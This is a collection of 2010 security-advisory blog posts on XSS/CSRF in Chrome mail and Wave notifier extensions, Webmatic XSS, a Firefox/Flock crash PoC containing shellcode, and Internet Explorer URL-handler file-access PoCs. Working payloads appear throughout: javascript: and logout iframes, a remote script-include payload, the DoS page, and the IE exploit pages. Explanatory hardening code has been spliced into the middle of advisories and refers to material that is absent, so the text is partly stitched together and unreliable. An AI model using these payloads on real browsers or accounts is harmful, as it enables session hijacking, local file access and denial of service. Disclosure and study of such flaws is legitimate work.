Google Services Notifier Chrome extension XSS/CSRF (posted 2010-06-18)<br />
######################################<br />
Google Services Notifier Chrome extension XSS/CSRF<br />
Extension: https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br />
Advisory: http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html<br />
Exploit available: yes  Vendor notified: NO<br />
#######################################<br />
<br />
So in this case "Notifier for Google Wave Chrome"<br />
has a flaw that allows attackers to mount XSS style attacks.<br />
<br />
All extensions run in their own origin, and there is no way to alter data from the extension<br />
or to get sensitive data like the email account or password, etc.<br />
<br />
If we look at how many users have installed this extension =><br />
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie<br />
109 users have installed it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Google Services Notifier lets users see when they have a new wave and<br />
view a preview of it.<br />
<br />
"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,<br />
Google Docs, Google Wave etc. More services will be added soon."<br />
<br />
If an attacker composes a new mail with HTML or JavaScript code in the<br />
subject and sends it to the victim, the code is executed when the victim clicks the<br />
extension to view a preview of the mail.<br />
<br />
So to exploit it we need to compose a "special" mail;<br />
for example, if we put an iframe like the following directly in the mail subject:<br />
"><iframe src="javascript:alert(location.href);"></iframe><br />
in both cases the alert is executed when the mail is previewed<br />
with the extension :) It is executed in a context where the location.href value is<br />
"about:blank".<br />
<br />
For example, send a mail with a Google Wave logout action in the body:<br />
"><iframe src="https://wave.google.com/wave/logout"></iframe><br />
It closes the session on Google Wave; this is a CSRF.<br />
<br />
######################€nd#################################<br />
Thnx for your time !!!<br />
Sincerely, Lostmon (lostmon@gmail.com)<br />
<br />
<br />
Notifier for Google Wave Chrome extension XSS/CSRF (posted 2010-06-18)<br />
######################################<br />
Notifier for Google Wave Chrome extension XSS/CSRF<br />
Extension: https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb<br />
Advisory: http://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.html<br />
Exploit available: yes  Vendor notified: NO<br />
#######################################<br />
<br />
So in this case "Notifier for Google Wave Chrome"<br />
has a flaw that allows attackers to mount XSS style attacks.<br />
<br />
All extensions run in their own origin, and there is no way to alter data from the extension<br />
or to get sensitive data like the email account or password, etc.<br />
<br />
If we look at how many users have installed this extension =><br />
https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb<br />
56,542 users have installed it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Notifier for Google Wave lets users see when they have a new wave and<br />
view a preview of it.<br />
<br />
If an attacker composes a new wave with HTML or JavaScript code in the<br />
body and sends it to the victim, the code is executed when the victim clicks the<br />
extension to view a preview of the wave.<br />
<br />
So to exploit it we need to compose a "special" wave;<br />
for example, if we put an iframe like the following directly in the body:<br />
"><iframe src="javascript:alert(location.href);"></iframe><br />
in both cases the alert is executed when the wave is previewed<br />
with the extension :) It is executed in a context where the location.href value is<br />
"about:blank".<br />
<br />
For example, send a wave with a Google Wave logout action in the body:<br />
"><iframe src="https://wave.google.com/wave/logout"></iframe><br />
It closes the session on Google Wave; this is a CSRF.<br />
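The Flock bookmark-title XSS above and the notifier preview XSS described here share one root cause: text the attacker controls (a bookmark title, a mail subject, a wave body) is concatenated into an extension page as HTML. The following is an added example, not Flock's or the extensions' own code (their real rendering code is not shown on this page): a parser for the NETSCAPE-Bookmark-file-1 export from the Flock advisory, the unsafe concatenation beside the escaped form, and a check that the escaped form contains no injected tag. The bookmark export and the subject string are constructed from the payloads quoted in the advisories.

```javascript
// Added example, not code from Flock or from the notifier extensions.
// Both inputs are constructed from the payloads quoted in the advisories on this page.

// Export in the NETSCAPE-Bookmark-file-1 format from the Flock advisory (trimmed).
const BOOKMARK_FILE = `<!DOCTYPE NETSCAPE-Bookmark-file-1>
<TITLE>Bookmarks</TITLE>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605">&quot;&gt;&lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A>
</DL><p>`;

// Mail subject / wave body payload from the notifier advisories.
const MAIL_SUBJECT = `"><iframe src="javascript:alert(location.href);"></iframe>`;

// Decode the entities the export format uses inside titles. An importer that stores the
// decoded result now holds a plain string that happens to contain live markup.
function decodeEntities(s) {
  return s.replace(/&quot;/g, '"').replace(/&lt;/g, '<').replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Minimal parser for the <DT><A HREF="..." ...>title</A> entries of the export.
function parseBookmarks(text) {
  const re = /<DT><A HREF="([^"]*)"[^>]*>(.*?)<\/A>/g;
  const out = [];
  let m;
  while ((m = re.exec(text)) !== null) {
    out.push({ href: m[1], title: decodeEntities(m[2]) });
  }
  return out;
}

// Escape so the browser shows the value as text, whether it lands in an attribute or in content.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Vulnerable pattern: the favorites page / preview popup is built by string concatenation,
// so a title that starts with "> closes the attribute and opens a new element.
function renderItemUnsafe(title) {
  return `<li class="fav" title="${title}">${title}</li>`;
}

// Hardened pattern: escape every untrusted value at the point it enters the HTML
// (in a real page: assign textContent / setAttribute instead of innerHTML).
function renderItemSafe(title) {
  const t = escapeHtml(title);
  return `<li class="fav" title="${t}">${t}</li>`;
}

// Check: does the rendered fragment contain any tag other than our own <li>?
function containsInjectedTag(html) {
  return /<(?!\/?li\b)[a-z]/i.test(html);
}
```

Rendered unsafely, both inputs fail the check (a `<script>` or `<iframe>` element appears in the page); escaped, the javascript: iframe and the Google Wave logout iframe become inert text, which is the behaviour the Gmail Checker Plus preview shows.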
<br />
######################€nd#################################<br />
.<br />
<br />
Thanks for your time!!!<br />
<br />
Sincerely,<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-83709628367092526922010-06-17T11:56:00.003-07:002010-06-22T04:50:38.785-07:00Gmail Checker plus Chrome extension XSS/CSRF II######################################<br />
Gmail Checker Plus Chrome extension XSS/CSRF II<br />
Extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br />
Advisory: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.html<br />
Exploit available: yes   Vendor notified: NO<br />
#######################################<br />
<br />
So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)<br />
has a flaw that allows attackers to perform XSS-style attacks.<br />
<br />
All extensions run in their own origin, so the injected code has no way to alter<br />
the extension's data or obtain sensitive data such as the e-mail account or password.<br />
<br />
If we look at how many users have installed this extension =><br />
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br />
303,711 users have installed it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Google Mail Checker Plus lets users see when they have new mail and<br />
view a preview of the mail.<br />
<br />
If an attacker composes a new mail with HTML or JavaScript code in the<br />
mail body and sends it to the victim, the code is executed when the victim<br />
clicks the extension to view a preview of the mail.<br />
<br />
So to exploit it we need to compose a "special" mail.<br />
For example, if we put an iframe directly in the mail body like<br />
"><iframe src="javascript:alert(location.href);"></iframe><br />
the extension shows this code as plain text and the alert is not executed...<br />
So we need to use a Gmail feature (auto-conversion of links into clickable URLs):<br />
we can compose an e-mail body with an http link like<br />
http://"><iframe src="javascript:alert(location.href);"></iframe><br />
or with a mail link like:<br />
lalala@"><iframe src="javascript:alert(location.href);"></iframe>.com<br />
In both cases the alert is executed when the victim tries to preview the<br />
e-mail with the extension :) It is executed in the extension's context and<br />
the location.href value is "about:blank".<br />
<br />
<br />
Gmail is a safe place, but the extensions used to manage it can be a<br />
potential attack vector.<br />
<br />
For example, send an e-mail with a Gmail logout action in the body:<br />
http://"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe><br />
It closes the Gmail session; this is a CSRF.<br />
Also, if the user has enabled desktop notifications, the iframe is executed in the desktop notification window as well, which can cause a denial of service of the extension, for example when the victim tries to change any option in the extension's options page :P<br />
<br />
We discussed it at http://code.google.com/p/chromium/issues/detail?id=45401<br />
The developer has released a patched version in trunk for the other issues I disclosed before;<br />
see the references for the previous vulns => OSVDB ID: 65459 and OSVDB ID: 65460<br />
Previous patch =><br />
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js<br />
and see the diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0<br />
<br />
<strike>I released it as a 0-day and did not notify the vendor because<br />
for the previous issues he patched the vulns and did not<br />
make any reference to them, stealing credit for the discovery.<br />
So I release these new vulns without notifying the developer :)</strike><br />
<br />
<b>UPDATED</b>: Now the extension's About section reflects the vulnerability and credits it to me :)<br />
<br />
<br />
<br />
######################€nd#################################<br />
.<br />
<br />
Thanks for your time!!!<br />
<br />
Sincerely,<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-45655821083304091502010-06-03T02:56:00.004-07:002010-06-15T04:51:23.151-07:00Gmail Checker plus Chrome extension XSS######################################<br />
Gmail Checker Plus Chrome extension XSS<br />
Extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br />
Advisory: http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html<br />
Exploit available: yes<br />
#######################################<br />
<br />
So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)<br />
has a flaw that allows attackers to perform XSS-style attacks.<br />
<br />
<b>All extensions run in their own origin, so the injected code has no way to alter the extension's data or obtain sensitive data such as the e-mail account or password.</b><br />
<br />
If we look at how many users have installed this extension =><br />
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br />
303,711 users have installed it (WoW)<br />
<br />
############<br />
explanation<br />
############<br />
<br />
Google Mail Checker Plus lets users see when they have new mail and<br />
view a preview of the mail.<br />
<br />
If an attacker composes a new mail with HTML or JavaScript code in the subject field and sends it to the victim, the code is executed when the victim clicks the extension to view the mail, and when the victim accepts the alert and views the preview of the mail the iframe is executed too.<br />
<br />
Gmail is a safe place, but the extension used to manage it can be a<br />
potential vector to attack it.<br />
<br />
For example, send an e-mail with a Gmail logout action in the subject:<br />
"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe><br />
It closes the Gmail session; this is a CSRF. The injected code is executed<br />
in the extension's context, and the location.href value is "about:blank".<br />
<br />
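The three extension advisories above (Notifier for Google Wave and the two Google Mail Checker Plus posts) describe one bug pattern: a preview pane that drops message text into the DOM, with the "auto-link" step turning an http:// or e-mail-looking token into live markup, so a closing quote in the token breaks out of the href attribute. The following is an added example, not code from the advisories or from either extension; it models that pattern in plain JavaScript beside a hardened renderer that escapes first and only links tokens the URL parser accepts. The function names (renderPreviewUnsafe, renderPreviewSafe, linkifyUnsafe, linkifySafe, escapeHtml) and the sample messages are assumptions made for this example; only the payload shapes come from the posts.<br />

```javascript
// Added example, not code from the extensions or the advisories above.
// Models the reported bug: a mail/wave preview built from message text
// that is escaped, except that anything looking like a link is inserted raw.
// All names and sample messages here are assumptions for the example.

// Minimal HTML escaper used by both renderers.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// ---- the vulnerable pattern ------------------------------------------------
// Plain text is escaped (which is why a bare <iframe> in the body showed up as
// text), but a token that starts with http:// or looks like user@host is
// trusted and wrapped in <a> verbatim. The quote inside
//   http://"><iframe src="javascript:alert(1)"></iframe>
// closes the href attribute and the iframe becomes real DOM. The Wave
// notifier and the Gmail subject-field case are the same bug without any
// escaping at all.
function linkifyUnsafe(text) {
  return text.split(/(\s+)/).map((tok) => {
    if (/^https?:\/\//i.test(tok)) {
      return `<a href="${tok}">${tok}</a>`;            // raw token in markup
    }
    if (/^[^\s@]+@\S+$/.test(tok)) {
      return `<a href="mailto:${tok}">${tok}</a>`;     // raw token in markup
    }
    return escapeHtml(tok);
  }).join('');
}

// What the extension would assign to previewElement.innerHTML.
function renderPreviewUnsafe(body) {
  return '<div class="preview">' + linkifyUnsafe(body) + '</div>';
}

// ---- hardened version ------------------------------------------------------
// Every token is escaped. A token becomes a link only if the WHATWG URL
// parser accepts it with an http(s) scheme, and the href is built from the
// parser's normalised output, escaped again before it is placed in markup.
// E-mail addresses are deliberately left as plain text.
function linkifySafe(text) {
  return text.split(/(\s+)/).map((tok) => {
    if (/^https?:\/\//i.test(tok)) {
      try {
        const u = new URL(tok);
        if (u.protocol === 'http:' || u.protocol === 'https:') {
          const href = escapeHtml(u.href);
          return `<a href="${href}" target="_blank" rel="noopener noreferrer">${href}</a>`;
        }
      } catch (_) {
        // not a parseable URL (e.g. a quote or '<' in the host part):
        // fall through and emit it as escaped text
      }
    }
    return escapeHtml(tok);
  }).join('');
}

function renderPreviewSafe(body) {
  return '<div class="preview">' + linkifySafe(body) + '</div>';
}

// Constructed messages in the payload shapes reported in the advisories.
const samples = [
  'http://"><iframe src="javascript:alert(location.href);"></iframe>',
  'lalala@"><iframe src="javascript:alert(location.href);"></iframe>.com',
  'http://"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>',
  'see http://example.com/?a=1&b=2 now',
];
for (const s of samples) {
  console.log('unsafe:', renderPreviewUnsafe(s));
  console.log('safe:  ', renderPreviewSafe(s));
}
```

The logout CSRF works for the same reason as the alert: once the iframe is live, the browser fetches its src with the victim's Gmail cookies attached. Escaping before linking removes both the script execution and the forged request; rendering the preview through textContent, or inside an iframe carrying the sandbox attribute, is a further layer for extensions that must show rich mail bodies.<br />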
We discussed it at http://code.google.com/p/chromium/issues/detail?id=45401<br />
The developer has released a patched version in trunk =><br />
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js<br />
Download it and copy it into your extension folder to fix the issue.<br />
<br />
See the diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0<br />
<br />
######################€nd#################################<br />
.<br />
<br />
Thanks for your time!!!<br />
<br />
Sincerely,<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-58853548463029396222010-04-09T14:30:00.001-07:002010-04-09T14:33:50.778-07:00Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught exception DoS##################################<br />
Firefox 3.6.2 & 3.6.3 and Flock 2.5 browsers uncaught exception<br />
error console DoS<br />
Vendor URL: http://www.mozilla.com<br />
Vendor URL: http://www.flock.com/<br />
Advisory: http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html<br />
###################################<br />
<br />
Firefox and Flock can hang on a malformed page, and when the user<br />
tries to open the Error Console, Firefox and Flock crash due to an<br />
uncaught exception; the underlying cause is an out-of-memory error.<br />
<br />
<br />
################<br />
Versions<br />
################<br />
<br />
firefox 3.6.2 and 3.6.3 vulnerable<br />
Bugzilla:<br />
https://bugzilla.mozilla.org/show_bug.cgi?id=557228<br />
<br />
Flock 2.5 vulnerable<br />
<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<html><br />
<head><br />
<title>Bad 'throw' exception remote DoS: Flock browser 2.5, Firefox 3.6.2 & 3.6.3</title><br />
</head><br />
<body onload="alert('Please press Ctrl+Shift+J');"><br />
<script type="text/javascript"><br />
// Seed string: n is doubled on every pass, so its length grows as 2^i.<br />
var n=unescape('%uf1a4%u7ffd');<br />
// Variant seed: var n=unescape('%uc0c0%uc0c0%uc0c0');<br />
// Shellcode for calc.exe (the original author notes it does not work).<br />
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');<br />
// Each pass writes an inline script that throws the ever-larger string as an<br />
// uncaught exception. The page hangs, and opening the Error Console<br />
// (Ctrl+Shift+J) then crashes the browser with an out-of-memory error.<br />
for(var i=0;i<64;i++){<br />
n=n+n;<br />
document.write('<script>throw n+s;</scr'+'ipt>');<br />
}<br />
</script><br />
<center><h1>Bad 'throw' exception remote DoS on Firefox 3.6.x and Flock browser 2.5</h1><br />
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br /><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> (lostmon@gmail.com) to affect Flock and Firefox.<br />
Remember to press Ctrl+Shift+J and make sure that your console log is on the "All" tab or the "Errors" tab, in Firefox and Flock :)</h3><br />
<br />
</center></body><br />
</html><br />
<br />
<br />
<br />
###################€nd ##########################<br />
<br />
Thanks to Estrella for being my light<br />
-- <br />
Sincerely,<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-62869881072600318892010-04-01T07:33:00.002-07:002010-04-01T07:34:43.885-07:00Flock browser marquee tag DoS############################################<br />
Flock browser marquee tag DoS<br />
Advisory: http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html<br />
############################################<br />
<br />
<br />
The Flock browser contains a flaw that may allow a remote denial of service.<br />
The issue is triggered when a victim visits a specially crafted web page<br />
with a lot of marquee HTML tags, and it results in a loss of availability<br />
(DoS) for the browser and possible memory corruption.<br />
<br />
This bug was first discovered by '599eme Man flouf@live.fr', and this<br />
is an extended research about it; he discovered it in these browsers:<br />
Opera 10.10<br />
Firefox 3.5.7<br />
Safari 4.0.4<br />
SeaMonkey 2.0.1<br />
<br />
and I tested it in:<br />
<br />
Flock Browser 1.2.6 vulnerable<br />
Flock Browser 2.5 vulnerable<br />
<br />
A sample code can be found/downloaded here =><br />
http://www.exploit-db.com/exploits/11347<br />
<br />
########################€nd ###################<br />
<br />
Thanks to Estrella for being my light<br />
-- <br />
Sincerely,<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-58817057575883416022010-03-19T07:03:00.002-07:002010-03-19T07:06:05.834-07:00Webmatic 3.0.3 Multiple cross-site scripting#################################<br />
Webmatic 3.0.3 multiple cross-site scripting<br />
Vendor URL: http://www.valarsoft.com/<br />
Advisory: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html<br />
Vendor notified: YES<br />
#################################<br />
<br />
Webmatic contains a flaw that allows a remote cross-site<br />
scripting attack. This flaw exists because the application<br />
does not validate multiple variables and form fields upon<br />
submission to the 'index.php' script. This could allow a<br />
user to create a specially crafted URL that would execute<br />
arbitrary code in a user's browser within the trust relationship<br />
between the browser and the server, leading to a loss of integrity.<br />
<br />
<br />
##############<br />
Versions<br />
##############<br />
<br />
valarsoft webmatic 3.0.3<br />
<br />
Prior versions may also<br />
be affected.<br />
<br />
<br />
################<br />
Timeline<br />
################<br />
<br />
Discovered: 13-01-2010<br />
Vendor notified: 14-03-2010<br />
Vendor response: 15-03-2010<br />
Disclosure: 19-03-2010<br />
<br />
###############<br />
Private messages<br />
################<br />
<br />
The subject form field is vulnerable.<br />
<br />
An attacker can compose a PM with a malformed title,<br />
and it is executed when the victim views their inbox<br />
or opens the PM.<br />
<br />
<br />
#################<br />
Forums<br />
#################<br />
<br />
The search form field, the 'filter' variable<br />
and the title form field are affected.<br />
<br />
An attacker can compose a post with a malformed title,<br />
and when a victim browses the forum the XSS is<br />
executed. The attacker can also compose a search URL<br />
with XSS in the 'filter' variable, or put the XSS in the<br />
search form field to execute it.<br />
<br />
##################<br />
Chat room<br />
###################<br />
<br />
The nickname form field is affected.<br />
<br />
An attacker can use a malformed nickname containing XSS, and<br />
when they join a channel the XSS is executed for all<br />
the channel's users.<br />
<br />
######################<br />
News<br />
####################<br />
<br />
The title form field is affected.<br />
<br />
An attacker can compose a news item with a malformed title, and<br />
when a user browses the news section the XSS is executed;<br />
also, if the news item has a summary on the home page, all users<br />
are affected by the XSS when they load the page.<br />
<br />
The 'pg' variable is affected.<br />
<br />
An attacker can compose a malformed URL in the news section<br />
with XSS code in the 'pg' variable; when a victim clicks<br />
this URL the XSS is executed.<br />
<br />
#########################<br />
banners section<br />
#########################<br />
<br />
The title and label form fields are affected.<br />
<br />
A remote user can add a banner<br />
with a malformed title and/or a malformed label;<br />
when the attacker visits their banner the XSS is executed<br />
in their own banner management page.<br />
Also, if a victim visits this banner the XSS is executed.<br />
<br />
############################€ND#############################<br />
<br />
Thanks to Estrella for being my light<br />
-- <br />
Sincerely,<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-79071247627386588002010-02-10T12:01:00.007-08:002010-02-10T12:23:18.558-08:00Internet explorer 7 & 8 URL Validation Vulnerability############################################<br />
Internet Explorer 7 & 8 URL validation vulnerability<br />
Original advisory: http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html<br />
Vendor URL: http://www.microsoft.com<br />
Related advisory: http://lostmon.blogspot.com/2010/02/internet-explorer-6-7-8-url-validation.html<br />
Related bulletins: MS10-002 and MS10-007<br />
Related CVE: CVE-2010-0027<br />
Related OSVDB ID: 62245 and 62245<br />
Related Secunia: SA38501 and SA38209<br />
Related BID: 37884<br />
############################################<br />
<br />
############<br />
Description<br />
############<br />
<br />
A remote code execution vulnerability exists in the way that Internet Explorer<br />
incorrectly validates input. An attacker could exploit the vulnerability by<br />
constructing a specially crafted URL. When a user clicks the URL, the<br />
vulnerability could allow remote code execution. An attacker who successfully<br />
exploited this vulnerability could gain the same user rights as the logged-on<br />
user. If a user is logged on with administrative user rights, an attacker who<br />
successfully exploited this vulnerability could take complete control of an<br />
affected system.<br />
<br />
#################<br />
Versions affected<br />
#################<br />
<br />
I have tested it in Internet Explorer 7 & 8 on these versions of Windows:<br />
<br />
All versions of Windows 7<br />
Windows XP Home<br />
Windows XP Pro<br />
<br />
See the exploitability index in the related Microsoft bulletins for a complete<br />
list of affected products.<br />
<br />
#############<br />
Timeline<br />
#############<br />
<br />
Discovered: 05-11-2009<br />
Reported to vendor: 15-11-2009<br />
Vendor response: 15-11-2009<br />
Vendor accepts in case manager: 19-11-2009<br />
Vendor patch: 21-01-2010<br />
Vendor patch 2: 09-02-2010<br />
Public disclosure: 21-01-2010<br />
Details disclosure: 10-02-2010<br />
<br />
##############<br />
Solution<br />
##############<br />
<br />
See<br />
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx<br />
and<br />
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx<br />
for more details and to download the vendor's patch.<br />
<br />
#######################<br />
Sample code and PoCs<br />
#######################<br />
<br />
This vulnerability is based on the way Internet Explorer validates URI handlers<br />
and the special character '#'.<br />
<br />
To test and understand it, first open Internet Explorer and type a fake handler<br />
such as 'handler:' in the address bar. IE shows the internal page<br />
'res://ieframe.dll/unknownprotocol.htm' because the protocol is unknown.<br />
If we type 'handler:http://[some-host]', IE waits to open the host but does<br />
not show any error or unknown-protocol page.<br />
<br />
If we type 'handler:handler2:' in the address bar, IE again shows the<br />
'res://ieframe.dll/unknownprotocol.htm' page.<br />
<br />
But if we concatenate two unknown protocol handlers and use the special<br />
character '#', as in 'handler:handler#:', Internet Explorer shows a warning<br />
alert: 'Internet Explorer cannot find file:///'.<br />
<br />
With this combination IE uses the file: protocol handler.<br />
<br />
Seeing this alert we can think: if we concatenate two handlers, the '#'<br />
character and a file path, we may be able to access files on the hard disk.<br />
<br />
'handler:handler#:c:\windows\calc.exe'<br />
But again we get 'Internet Explorer cannot find the file'.<br />
<br />
So we try traversal-style file access:<br />
handler:handler#:../../../../C:\windows/calc.exe<br />
Now IE prompts us to download or execute the file.<br />
We have bypassed the restrictions!!!<br />
<br />
So far we have been working in the address bar. Can a web page use this issue<br />
to do the same and ask to download the file? YES.<br />
<br />
We can construct a web page with an iframe like:<br />
<br />
############# PoC one #################<br />
<html><br />
<iframe id="myIframe"<br />
src="handler:handler#:../../../../C:\windows/calc.exe"></iframe><br />
</html><br />
################# EOF #################<br />
<br />
Whether we open it from a local folder, a local server, a LAN server or a<br />
remote server, in all cases IE asks to download the file.<br />
<br />
So we can access any file on the hard disk. Can we execute a file or read its<br />
content? YES.<br />
<br />
If we know the path of a txt file we can do the same (put a txt file in the<br />
root of C: and write some content in it) and then:<br />
<br />
############## PoC two #############<br />
<html><br />
<iframe id="myIframe"<br />
src="handler:handler#:../../../../C:\our_txtfile.txt"></iframe><br />
</html><br />
############# EOF #################<br />
<br />
When we open this PoC it reads the content of our_txtfile.txt and shows it in<br />
the frame.<br />
<br />
Can we execute files? YES.<br />
<br />
We can execute an html, xml or search-ms file from the hard disk, for example:<br />
<br />
############# PoC three ###############<br />
<html><br />
<iframe id="myIframe"<br />
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"><br />
</iframe><br />
</html><br />
############### EOF ###########<br />
<br />
This one launches Explorer with a local search :D<br />
<br />
Can we read the content of any file and upload it to a server, or manipulate<br />
the content?<br />
<br />
I have not found a way to do it: in every case Internet Explorer denies access<br />
to the content from the iframe.<br />
<br />
############# PoC four ##############<br />
<br />
<html><br />
<head><br />
</head><br />
<body><br />
<script type="text/javascript"><br />
function getContentFromIframe(iFrameName)<br />
{<br />
  var myIFrame = document.getElementById(iFrameName);<br />
  var content = myIFrame.contentWindow.document.body.innerHTML;<br />
  alert('content: ' + content);<br />
<br />
  content = 'change iframe content';<br />
  myIFrame.contentWindow.document.body.innerHTML = content;<br />
}<br />
</script><br />
<iframe id="myIframe"<br />
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe><br />
<br />
<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a><br />
<br />
</body><br />
</html><br />
<br />
##################### EOF #############################<br />
<br />
It gives an access denied error.<br />
If we try XMLHttpRequest() it does not work either; access is denied again:<br />
<br />
########### PoC five ######################<br />
var contents;<br />
var req;<br />
// Callback for onreadystatechange: show the response once the request completes.<br />
function processReqChange() {<br />
  if (req.readyState == 4) { alert(req.responseText); }<br />
}<br />
req = new XMLHttpRequest();<br />
req.onreadystatechange = processReqChange;<br />
req.open("GET",<br />
"handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",<br />
true);<br />
req.send("");<br />
############ EOF #############<br />
<br />
If we use it as an ActiveX object it shows access denied again :P<br />
<br />
############### PoC six #############<br />
<br />
<html><body><div><br />
<br />
<script><br />
function getHTTPObject()<br />
{<br />
  if (typeof XMLHttpRequest != 'undefined')<br />
  {<br />
    return new XMLHttpRequest();<br />
  }<br />
  try {<br />
    return new ActiveXObject("Msxml2.XMLHTTP"); }<br />
  catch (e)<br />
  {<br />
    try<br />
    {<br />
      return new ActiveXObject("Microsoft.XMLHTTP");<br />
    }<br />
    catch (e) {}<br />
  }<br />
  return false;<br />
}<br />
x = getHTTPObject();<br />
x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);<br />
x.send(null);<br />
alert(x.responseText);<br />
<br />
</script><br />
<!-- end of input --><br />
</div></body></html><br />
<br />
################ EOF ######################<br />
<br />
So we can read txt files, execute html, xml and search-ms files, and download<br />
and execute binary files from the victim's hard disk, just by having the<br />
victim view a crafted web page.<br />
<br />
Microsoft has patched it and released security bulletins that solve this<br />
issue; see<br />
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx<br />
and<br />
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx<br />
for details and to download the security update, which fixes this issue and<br />
seven more vulnerabilities.<br />
<br />
#################### €nd ################<br />
<br />
Thanks to the Google Security Team for their support<br />
Thanks to MSRC for their support and acknowledgments<br />
Thanks to icar0 & sha0 from Badchecksum<br />
Thanks to Brink for testing with me on some Windows versions :D<br />
Thanks to Estrella for being my light<br />
-- <br />
Sincerely,<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
